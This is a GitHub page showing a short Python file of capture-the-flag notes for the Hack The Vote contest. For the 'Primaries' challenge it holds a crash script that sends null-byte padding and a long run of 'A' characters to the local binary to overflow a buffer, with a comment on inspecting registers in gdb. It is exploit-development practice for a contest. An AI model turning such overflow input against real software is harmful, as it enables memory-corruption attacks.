FilesExpand file tree

 master

/

hackthevote.py

Copy path

Blame

More file actions

Blame

More file actions

Latest commit

 

History

History

History

31 lines (27 loc) · 788 Bytes

 master

/

hackthevote.py

Top

File metadata and controls

• Code
• Blame

31 lines (27 loc) · 788 Bytes

Raw

Copy raw file

Download raw file

Open symbols panel

Edit and raw actions

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

# exploitation 100 - IRS

https://github.com/RPISEC/HackTheVote

# exploitation 150 - Primaries

segfaulting script

```python

import threading

from time import sleep

import subprocess

proc = subprocess.Popen('./primaries',

shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE,

stderr=subprocess.STDOUT)

def worker():

while True:

proc_read = proc.stdout.readline()

if proc_read:

print proc_read

t = threading.Thread(target=worker)

t.start()

raw_input()

# attach gdb, continue, examine regs, see the As

for i in range(1,100000):

proc.stdin.write("\x00"*254)

proc.stdin.write("\x00\x00\x00-\x00\x00-\x00\x00\x00\x00")

proc.stdin.write("\x00"*246)

proc.stdin.write("4\n")

proc.stdin.write("A"*0x110)

```